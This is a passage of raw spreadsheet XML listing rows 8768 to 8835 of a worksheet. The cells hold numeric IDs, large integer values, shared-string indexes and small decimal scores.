      <c r="C8768" s="2" t="s">
        <v>8353</v>
      </c>
      <c r="D8768" s="2">
        <v>1.0</v>
      </c>
      <c r="E8768" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8768" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="8769" ht="15.75" customHeight="1">
      <c r="A8769" s="1">
        <v>18311.0</v>
      </c>
      <c r="B8769" s="2">
        <v>5.2375475E7</v>
      </c>
      <c r="C8769" s="2" t="s">
        <v>8354</v>
      </c>
      <c r="D8769" s="2">
        <v>1.0</v>
      </c>
      <c r="E8769" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8769" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="8770" ht="15.75" customHeight="1">
      <c r="A8770" s="1">
        <v>22100.0</v>
      </c>
      <c r="B8770" s="2">
        <v>3.0832668E7</v>
      </c>
      <c r="C8770" s="2" t="s">
        <v>8355</v>
      </c>
      <c r="D8770" s="2">
        <v>1.0</v>
      </c>
      <c r="E8770" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8770" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="8771" ht="15.75" customHeight="1">
      <c r="A8771" s="1">
        <v>24503.0</v>
      </c>
      <c r="B8771" s="2">
        <v>1.1096154E7</v>
      </c>
      <c r="C8771" s="2" t="s">
        <v>8356</v>
      </c>
      <c r="D8771" s="2">
        <v>1.0</v>
      </c>
      <c r="E8771" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8771" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="8772" ht="15.75" customHeight="1">
      <c r="A8772" s="1">
        <v>24785.0</v>
      </c>
      <c r="B8772" s="2">
        <v>1.1953554E7</v>
      </c>
      <c r="C8772" s="2" t="s">
        <v>8357</v>
      </c>
      <c r="D8772" s="2">
        <v>1.0</v>
      </c>
      <c r="E8772" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8772" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="8773" ht="15.75" customHeight="1">
      <c r="A8773" s="1">
        <v>29365.0</v>
      </c>
      <c r="B8773" s="2">
        <v>3.1663316E7</v>
      </c>
      <c r="C8773" s="2" t="s">
        <v>8358</v>
      </c>
      <c r="D8773" s="2">
        <v>1.0</v>
      </c>
      <c r="E8773" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8773" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="8774" ht="15.75" customHeight="1">
      <c r="A8774" s="1">
        <v>31151.0</v>
      </c>
      <c r="B8774" s="2">
        <v>4.8908647E7</v>
      </c>
      <c r="C8774" s="2" t="s">
        <v>8359</v>
      </c>
      <c r="D8774" s="2">
        <v>1.0</v>
      </c>
      <c r="E8774" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8774" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="8775" ht="15.75" customHeight="1">
      <c r="A8775" s="1">
        <v>1754.0</v>
      </c>
      <c r="B8775" s="2">
        <v>2.8894993E7</v>
      </c>
      <c r="C8775" s="2" t="s">
        <v>8360</v>
      </c>
      <c r="D8775" s="2">
        <v>1.0</v>
      </c>
      <c r="E8775" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8775" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="8776" ht="15.75" customHeight="1">
      <c r="A8776" s="1">
        <v>5622.0</v>
      </c>
      <c r="B8776" s="2">
        <v>4.6184439E7</v>
      </c>
      <c r="C8776" s="2" t="s">
        <v>8361</v>
      </c>
      <c r="D8776" s="2">
        <v>1.0</v>
      </c>
      <c r="E8776" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8776" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="8777" ht="15.75" customHeight="1">
      <c r="A8777" s="1">
        <v>26650.0</v>
      </c>
      <c r="B8777" s="2">
        <v>1.8053498E7</v>
      </c>
      <c r="C8777" s="2" t="s">
        <v>8362</v>
      </c>
      <c r="D8777" s="2">
        <v>1.0</v>
      </c>
      <c r="E8777" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8777" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="8778" ht="15.75" customHeight="1">
      <c r="A8778" s="1">
        <v>6653.0</v>
      </c>
      <c r="B8778" s="2">
        <v>4.909109E7</v>
      </c>
      <c r="C8778" s="2" t="s">
        <v>8363</v>
      </c>
      <c r="D8778" s="2">
        <v>1.0</v>
      </c>
      <c r="E8778" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8778" s="2">
        <v>0.1191756272401434</v>
      </c>
    </row>
    <row r="8779" ht="15.75" customHeight="1">
      <c r="A8779" s="1">
        <v>12424.0</v>
      </c>
      <c r="B8779" s="2">
        <v>2.9173977E7</v>
      </c>
      <c r="C8779" s="2" t="s">
        <v>8364</v>
      </c>
      <c r="D8779" s="2">
        <v>1.0</v>
      </c>
      <c r="E8779" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8779" s="2">
        <v>0.1191756272401434</v>
      </c>
    </row>
    <row r="8780" ht="15.75" customHeight="1">
      <c r="A8780" s="1">
        <v>33084.0</v>
      </c>
      <c r="B8780" s="2">
        <v>6934952.0</v>
      </c>
      <c r="C8780" s="2" t="s">
        <v>8365</v>
      </c>
      <c r="D8780" s="2">
        <v>1.0</v>
      </c>
      <c r="E8780" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8780" s="2">
        <v>0.1191756272401434</v>
      </c>
    </row>
    <row r="8781" ht="15.75" customHeight="1">
      <c r="A8781" s="1">
        <v>13608.0</v>
      </c>
      <c r="B8781" s="2">
        <v>3.5823306E7</v>
      </c>
      <c r="C8781" s="2" t="s">
        <v>8366</v>
      </c>
      <c r="D8781" s="2">
        <v>1.0</v>
      </c>
      <c r="E8781" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8781" s="2">
        <v>0.1190476190476191</v>
      </c>
    </row>
    <row r="8782" ht="15.75" customHeight="1">
      <c r="A8782" s="1">
        <v>31127.0</v>
      </c>
      <c r="B8782" s="2">
        <v>4888838.0</v>
      </c>
      <c r="C8782" s="2" t="s">
        <v>8367</v>
      </c>
      <c r="D8782" s="2">
        <v>1.0</v>
      </c>
      <c r="E8782" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8782" s="2">
        <v>0.1190476190476191</v>
      </c>
    </row>
    <row r="8783" ht="15.75" customHeight="1">
      <c r="A8783" s="1">
        <v>3596.0</v>
      </c>
      <c r="B8783" s="2">
        <v>3.9066202E7</v>
      </c>
      <c r="C8783" s="2" t="s">
        <v>8368</v>
      </c>
      <c r="D8783" s="2">
        <v>1.0</v>
      </c>
      <c r="E8783" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8783" s="2">
        <v>0.1189236111111111</v>
      </c>
    </row>
    <row r="8784" ht="15.75" customHeight="1">
      <c r="A8784" s="1">
        <v>512.0</v>
      </c>
      <c r="B8784" s="2">
        <v>1.8172029E7</v>
      </c>
      <c r="C8784" s="2" t="s">
        <v>8369</v>
      </c>
      <c r="D8784" s="2">
        <v>1.0</v>
      </c>
      <c r="E8784" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8784" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8785" ht="15.75" customHeight="1">
      <c r="A8785" s="1">
        <v>676.0</v>
      </c>
      <c r="B8785" s="2">
        <v>2.0263422E7</v>
      </c>
      <c r="C8785" s="2" t="s">
        <v>8370</v>
      </c>
      <c r="D8785" s="2">
        <v>1.0</v>
      </c>
      <c r="E8785" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8785" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8786" ht="15.75" customHeight="1">
      <c r="A8786" s="1">
        <v>760.0</v>
      </c>
      <c r="B8786" s="2">
        <v>2.1008139E7</v>
      </c>
      <c r="C8786" s="2" t="s">
        <v>8371</v>
      </c>
      <c r="D8786" s="2">
        <v>1.0</v>
      </c>
      <c r="E8786" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8786" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8787" ht="15.75" customHeight="1">
      <c r="A8787" s="1">
        <v>892.0</v>
      </c>
      <c r="B8787" s="2">
        <v>2.2023569E7</v>
      </c>
      <c r="C8787" s="2" t="s">
        <v>8372</v>
      </c>
      <c r="D8787" s="2">
        <v>1.0</v>
      </c>
      <c r="E8787" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8787" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8788" ht="15.75" customHeight="1">
      <c r="A8788" s="1">
        <v>894.0</v>
      </c>
      <c r="B8788" s="2">
        <v>2.2034608E7</v>
      </c>
      <c r="C8788" s="2" t="s">
        <v>8373</v>
      </c>
      <c r="D8788" s="2">
        <v>1.0</v>
      </c>
      <c r="E8788" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8788" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8789" ht="15.75" customHeight="1">
      <c r="A8789" s="1">
        <v>1076.0</v>
      </c>
      <c r="B8789" s="2">
        <v>2.3593646E7</v>
      </c>
      <c r="C8789" s="2" t="s">
        <v>8374</v>
      </c>
      <c r="D8789" s="2">
        <v>1.0</v>
      </c>
      <c r="E8789" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8789" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8790" ht="15.75" customHeight="1">
      <c r="A8790" s="1">
        <v>1087.0</v>
      </c>
      <c r="B8790" s="2">
        <v>2.3767814E7</v>
      </c>
      <c r="C8790" s="2" t="s">
        <v>8375</v>
      </c>
      <c r="D8790" s="2">
        <v>1.0</v>
      </c>
      <c r="E8790" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8790" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8791" ht="15.75" customHeight="1">
      <c r="A8791" s="1">
        <v>1798.0</v>
      </c>
      <c r="B8791" s="2">
        <v>2.9134786E7</v>
      </c>
      <c r="C8791" s="2" t="s">
        <v>8376</v>
      </c>
      <c r="D8791" s="2">
        <v>1.0</v>
      </c>
      <c r="E8791" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8791" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8792" ht="15.75" customHeight="1">
      <c r="A8792" s="1">
        <v>2012.0</v>
      </c>
      <c r="B8792" s="2">
        <v>3.0701868E7</v>
      </c>
      <c r="C8792" s="2" t="s">
        <v>8377</v>
      </c>
      <c r="D8792" s="2">
        <v>1.0</v>
      </c>
      <c r="E8792" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8792" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8793" ht="15.75" customHeight="1">
      <c r="A8793" s="1">
        <v>2132.0</v>
      </c>
      <c r="B8793" s="2">
        <v>3.1508769E7</v>
      </c>
      <c r="C8793" s="2" t="s">
        <v>8378</v>
      </c>
      <c r="D8793" s="2">
        <v>1.0</v>
      </c>
      <c r="E8793" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8793" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8794" ht="15.75" customHeight="1">
      <c r="A8794" s="1">
        <v>2287.0</v>
      </c>
      <c r="B8794" s="2">
        <v>3.2549944E7</v>
      </c>
      <c r="C8794" s="2" t="s">
        <v>8379</v>
      </c>
      <c r="D8794" s="2">
        <v>1.0</v>
      </c>
      <c r="E8794" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8794" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8795" ht="15.75" customHeight="1">
      <c r="A8795" s="1">
        <v>2755.0</v>
      </c>
      <c r="B8795" s="2">
        <v>3.5100614E7</v>
      </c>
      <c r="C8795" s="2" t="s">
        <v>8380</v>
      </c>
      <c r="D8795" s="2">
        <v>1.0</v>
      </c>
      <c r="E8795" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8795" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8796" ht="15.75" customHeight="1">
      <c r="A8796" s="1">
        <v>2764.0</v>
      </c>
      <c r="B8796" s="2">
        <v>3.5110311E7</v>
      </c>
      <c r="C8796" s="2" t="s">
        <v>8381</v>
      </c>
      <c r="D8796" s="2">
        <v>1.0</v>
      </c>
      <c r="E8796" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8796" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8797" ht="15.75" customHeight="1">
      <c r="A8797" s="1">
        <v>2780.0</v>
      </c>
      <c r="B8797" s="2">
        <v>3.5187006E7</v>
      </c>
      <c r="C8797" s="2" t="s">
        <v>8382</v>
      </c>
      <c r="D8797" s="2">
        <v>1.0</v>
      </c>
      <c r="E8797" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8797" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8798" ht="15.75" customHeight="1">
      <c r="A8798" s="1">
        <v>3148.0</v>
      </c>
      <c r="B8798" s="2">
        <v>3.6970977E7</v>
      </c>
      <c r="C8798" s="2" t="s">
        <v>8383</v>
      </c>
      <c r="D8798" s="2">
        <v>1.0</v>
      </c>
      <c r="E8798" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8798" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8799" ht="15.75" customHeight="1">
      <c r="A8799" s="1">
        <v>3173.0</v>
      </c>
      <c r="B8799" s="2">
        <v>3.7091634E7</v>
      </c>
      <c r="C8799" s="2" t="s">
        <v>8384</v>
      </c>
      <c r="D8799" s="2">
        <v>1.0</v>
      </c>
      <c r="E8799" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8799" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8800" ht="15.75" customHeight="1">
      <c r="A8800" s="1">
        <v>3175.0</v>
      </c>
      <c r="B8800" s="2">
        <v>3.7091634E7</v>
      </c>
      <c r="C8800" s="2" t="s">
        <v>8385</v>
      </c>
      <c r="D8800" s="2">
        <v>1.0</v>
      </c>
      <c r="E8800" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8800" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8801" ht="15.75" customHeight="1">
      <c r="A8801" s="1">
        <v>3962.0</v>
      </c>
      <c r="B8801" s="2">
        <v>4.0713606E7</v>
      </c>
      <c r="C8801" s="2" t="s">
        <v>8386</v>
      </c>
      <c r="D8801" s="2">
        <v>1.0</v>
      </c>
      <c r="E8801" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8801" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8802" ht="15.75" customHeight="1">
      <c r="A8802" s="1">
        <v>4009.0</v>
      </c>
      <c r="B8802" s="2">
        <v>4.0915738E7</v>
      </c>
      <c r="C8802" s="2" t="s">
        <v>8387</v>
      </c>
      <c r="D8802" s="2">
        <v>1.0</v>
      </c>
      <c r="E8802" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8802" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8803" ht="15.75" customHeight="1">
      <c r="A8803" s="1">
        <v>4158.0</v>
      </c>
      <c r="B8803" s="2">
        <v>4.1503899E7</v>
      </c>
      <c r="C8803" s="2" t="s">
        <v>8388</v>
      </c>
      <c r="D8803" s="2">
        <v>1.0</v>
      </c>
      <c r="E8803" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8803" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8804" ht="15.75" customHeight="1">
      <c r="A8804" s="1">
        <v>4313.0</v>
      </c>
      <c r="B8804" s="2">
        <v>4.1991097E7</v>
      </c>
      <c r="C8804" s="2" t="s">
        <v>8389</v>
      </c>
      <c r="D8804" s="2">
        <v>1.0</v>
      </c>
      <c r="E8804" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8804" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8805" ht="15.75" customHeight="1">
      <c r="A8805" s="1">
        <v>4328.0</v>
      </c>
      <c r="B8805" s="2">
        <v>4.2048158E7</v>
      </c>
      <c r="C8805" s="2" t="s">
        <v>8390</v>
      </c>
      <c r="D8805" s="2">
        <v>1.0</v>
      </c>
      <c r="E8805" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8805" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8806" ht="15.75" customHeight="1">
      <c r="A8806" s="1">
        <v>4472.0</v>
      </c>
      <c r="B8806" s="2">
        <v>4.2473246E7</v>
      </c>
      <c r="C8806" s="2" t="s">
        <v>8391</v>
      </c>
      <c r="D8806" s="2">
        <v>1.0</v>
      </c>
      <c r="E8806" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8806" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8807" ht="15.75" customHeight="1">
      <c r="A8807" s="1">
        <v>4862.0</v>
      </c>
      <c r="B8807" s="2">
        <v>4.3812596E7</v>
      </c>
      <c r="C8807" s="2" t="s">
        <v>8392</v>
      </c>
      <c r="D8807" s="2">
        <v>1.0</v>
      </c>
      <c r="E8807" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8807" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8808" ht="15.75" customHeight="1">
      <c r="A8808" s="1">
        <v>5424.0</v>
      </c>
      <c r="B8808" s="2">
        <v>4.5567864E7</v>
      </c>
      <c r="C8808" s="2" t="s">
        <v>8393</v>
      </c>
      <c r="D8808" s="2">
        <v>1.0</v>
      </c>
      <c r="E8808" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8808" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8809" ht="15.75" customHeight="1">
      <c r="A8809" s="1">
        <v>5960.0</v>
      </c>
      <c r="B8809" s="2">
        <v>4.7322408E7</v>
      </c>
      <c r="C8809" s="2" t="s">
        <v>8394</v>
      </c>
      <c r="D8809" s="2">
        <v>1.0</v>
      </c>
      <c r="E8809" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8809" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8810" ht="15.75" customHeight="1">
      <c r="A8810" s="1">
        <v>6014.0</v>
      </c>
      <c r="B8810" s="2">
        <v>4.7473531E7</v>
      </c>
      <c r="C8810" s="2" t="s">
        <v>8395</v>
      </c>
      <c r="D8810" s="2">
        <v>1.0</v>
      </c>
      <c r="E8810" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8810" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8811" ht="15.75" customHeight="1">
      <c r="A8811" s="1">
        <v>6076.0</v>
      </c>
      <c r="B8811" s="2">
        <v>4.7643597E7</v>
      </c>
      <c r="C8811" s="2" t="s">
        <v>8396</v>
      </c>
      <c r="D8811" s="2">
        <v>1.0</v>
      </c>
      <c r="E8811" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8811" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8812" ht="15.75" customHeight="1">
      <c r="A8812" s="1">
        <v>6103.0</v>
      </c>
      <c r="B8812" s="2">
        <v>4.7718764E7</v>
      </c>
      <c r="C8812" s="2" t="s">
        <v>8397</v>
      </c>
      <c r="D8812" s="2">
        <v>1.0</v>
      </c>
      <c r="E8812" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8812" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8813" ht="15.75" customHeight="1">
      <c r="A8813" s="1">
        <v>6538.0</v>
      </c>
      <c r="B8813" s="2">
        <v>4.8853201E7</v>
      </c>
      <c r="C8813" s="2" t="s">
        <v>8398</v>
      </c>
      <c r="D8813" s="2">
        <v>1.0</v>
      </c>
      <c r="E8813" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8813" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8814" ht="15.75" customHeight="1">
      <c r="A8814" s="1">
        <v>7638.0</v>
      </c>
      <c r="B8814" s="2">
        <v>5.1769717E7</v>
      </c>
      <c r="C8814" s="2" t="s">
        <v>8399</v>
      </c>
      <c r="D8814" s="2">
        <v>1.0</v>
      </c>
      <c r="E8814" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8814" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8815" ht="15.75" customHeight="1">
      <c r="A8815" s="1">
        <v>7858.0</v>
      </c>
      <c r="B8815" s="2">
        <v>5.2361539E7</v>
      </c>
      <c r="C8815" s="2" t="s">
        <v>8400</v>
      </c>
      <c r="D8815" s="2">
        <v>1.0</v>
      </c>
      <c r="E8815" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8815" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8816" ht="15.75" customHeight="1">
      <c r="A8816" s="1">
        <v>7959.0</v>
      </c>
      <c r="B8816" s="2">
        <v>5.2655969E7</v>
      </c>
      <c r="C8816" s="2" t="s">
        <v>8401</v>
      </c>
      <c r="D8816" s="2">
        <v>1.0</v>
      </c>
      <c r="E8816" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8816" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8817" ht="15.75" customHeight="1">
      <c r="A8817" s="1">
        <v>8563.0</v>
      </c>
      <c r="B8817" s="2">
        <v>5.4175021E7</v>
      </c>
      <c r="C8817" s="2" t="s">
        <v>8402</v>
      </c>
      <c r="D8817" s="2">
        <v>1.0</v>
      </c>
      <c r="E8817" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8817" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8818" ht="15.75" customHeight="1">
      <c r="A8818" s="1">
        <v>9095.0</v>
      </c>
      <c r="B8818" s="2">
        <v>5.5145976E7</v>
      </c>
      <c r="C8818" s="2" t="s">
        <v>8403</v>
      </c>
      <c r="D8818" s="2">
        <v>1.0</v>
      </c>
      <c r="E8818" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8818" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8819" ht="15.75" customHeight="1">
      <c r="A8819" s="1">
        <v>9096.0</v>
      </c>
      <c r="B8819" s="2">
        <v>5.5145976E7</v>
      </c>
      <c r="C8819" s="2" t="s">
        <v>8403</v>
      </c>
      <c r="D8819" s="2">
        <v>1.0</v>
      </c>
      <c r="E8819" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8819" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8820" ht="15.75" customHeight="1">
      <c r="A8820" s="1">
        <v>9097.0</v>
      </c>
      <c r="B8820" s="2">
        <v>5.5145976E7</v>
      </c>
      <c r="C8820" s="2" t="s">
        <v>8403</v>
      </c>
      <c r="D8820" s="2">
        <v>1.0</v>
      </c>
      <c r="E8820" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8820" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8821" ht="15.75" customHeight="1">
      <c r="A8821" s="1">
        <v>9098.0</v>
      </c>
      <c r="B8821" s="2">
        <v>5.5145976E7</v>
      </c>
      <c r="C8821" s="2" t="s">
        <v>8403</v>
      </c>
      <c r="D8821" s="2">
        <v>1.0</v>
      </c>
      <c r="E8821" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8821" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8822" ht="15.75" customHeight="1">
      <c r="A8822" s="1">
        <v>10745.0</v>
      </c>
      <c r="B8822" s="2">
        <v>1.5455458E7</v>
      </c>
      <c r="C8822" s="2" t="s">
        <v>8404</v>
      </c>
      <c r="D8822" s="2">
        <v>1.0</v>
      </c>
      <c r="E8822" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8822" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8823" ht="15.75" customHeight="1">
      <c r="A8823" s="1">
        <v>11614.0</v>
      </c>
      <c r="B8823" s="2">
        <v>2.3059924E7</v>
      </c>
      <c r="C8823" s="2" t="s">
        <v>8405</v>
      </c>
      <c r="D8823" s="2">
        <v>1.0</v>
      </c>
      <c r="E8823" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8823" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8824" ht="15.75" customHeight="1">
      <c r="A8824" s="1">
        <v>11841.0</v>
      </c>
      <c r="B8824" s="2">
        <v>2.4708978E7</v>
      </c>
      <c r="C8824" s="2" t="s">
        <v>8406</v>
      </c>
      <c r="D8824" s="2">
        <v>1.0</v>
      </c>
      <c r="E8824" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8824" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8825" ht="15.75" customHeight="1">
      <c r="A8825" s="1">
        <v>12183.0</v>
      </c>
      <c r="B8825" s="2">
        <v>2.7481027E7</v>
      </c>
      <c r="C8825" s="2" t="s">
        <v>8407</v>
      </c>
      <c r="D8825" s="2">
        <v>1.0</v>
      </c>
      <c r="E8825" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8825" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8826" ht="15.75" customHeight="1">
      <c r="A8826" s="1">
        <v>12224.0</v>
      </c>
      <c r="B8826" s="2">
        <v>2.7748771E7</v>
      </c>
      <c r="C8826" s="2" t="s">
        <v>8408</v>
      </c>
      <c r="D8826" s="2">
        <v>1.0</v>
      </c>
      <c r="E8826" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8826" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8827" ht="15.75" customHeight="1">
      <c r="A8827" s="1">
        <v>12299.0</v>
      </c>
      <c r="B8827" s="2">
        <v>2.8312536E7</v>
      </c>
      <c r="C8827" s="2" t="s">
        <v>8409</v>
      </c>
      <c r="D8827" s="2">
        <v>1.0</v>
      </c>
      <c r="E8827" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8827" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8828" ht="15.75" customHeight="1">
      <c r="A8828" s="1">
        <v>12643.0</v>
      </c>
      <c r="B8828" s="2">
        <v>3.0373775E7</v>
      </c>
      <c r="C8828" s="2" t="s">
        <v>8410</v>
      </c>
      <c r="D8828" s="2">
        <v>1.0</v>
      </c>
      <c r="E8828" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8828" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8829" ht="15.75" customHeight="1">
      <c r="A8829" s="1">
        <v>12695.0</v>
      </c>
      <c r="B8829" s="2">
        <v>3.0754618E7</v>
      </c>
      <c r="C8829" s="2" t="s">
        <v>8411</v>
      </c>
      <c r="D8829" s="2">
        <v>1.0</v>
      </c>
      <c r="E8829" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8829" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8830" ht="15.75" customHeight="1">
      <c r="A8830" s="1">
        <v>12839.0</v>
      </c>
      <c r="B8830" s="2">
        <v>3.1734449E7</v>
      </c>
      <c r="C8830" s="2" t="s">
        <v>8412</v>
      </c>
      <c r="D8830" s="2">
        <v>1.0</v>
      </c>
      <c r="E8830" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8830" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8831" ht="15.75" customHeight="1">
      <c r="A8831" s="1">
        <v>12986.0</v>
      </c>
      <c r="B8831" s="2">
        <v>3.2718968E7</v>
      </c>
      <c r="C8831" s="2" t="s">
        <v>8413</v>
      </c>
      <c r="D8831" s="2">
        <v>1.0</v>
      </c>
      <c r="E8831" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8831" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8832" ht="15.75" customHeight="1">
      <c r="A8832" s="1">
        <v>13354.0</v>
      </c>
      <c r="B8832" s="2">
        <v>3.4734762E7</v>
      </c>
      <c r="C8832" s="2" t="s">
        <v>8414</v>
      </c>
      <c r="D8832" s="2">
        <v>1.0</v>
      </c>
      <c r="E8832" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8832" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8833" ht="15.75" customHeight="1">
      <c r="A8833" s="1">
        <v>14075.0</v>
      </c>
      <c r="B8833" s="2">
        <v>3.7658805E7</v>
      </c>
      <c r="C8833" s="2" t="s">
        <v>8415</v>
      </c>
      <c r="D8833" s="2">
        <v>1.0</v>
      </c>
      <c r="E8833" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8833" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8834" ht="15.75" customHeight="1">
      <c r="A8834" s="1">
        <v>14349.0</v>
      </c>
      <c r="B8834" s="2">
        <v>3.8885899E7</v>
      </c>
      <c r="C8834" s="2" t="s">
        <v>8416</v>
      </c>
      <c r="D8834" s="2">
        <v>1.0</v>
      </c>
      <c r="E8834" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8834" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8835" ht="15.75" customHeight="1">
      <c r="A8835" s="1">
        <v>14509.0</v>
      </c>
      <c r="B8835" s="2">
        <v>3.9711497E7</v>
      </c>
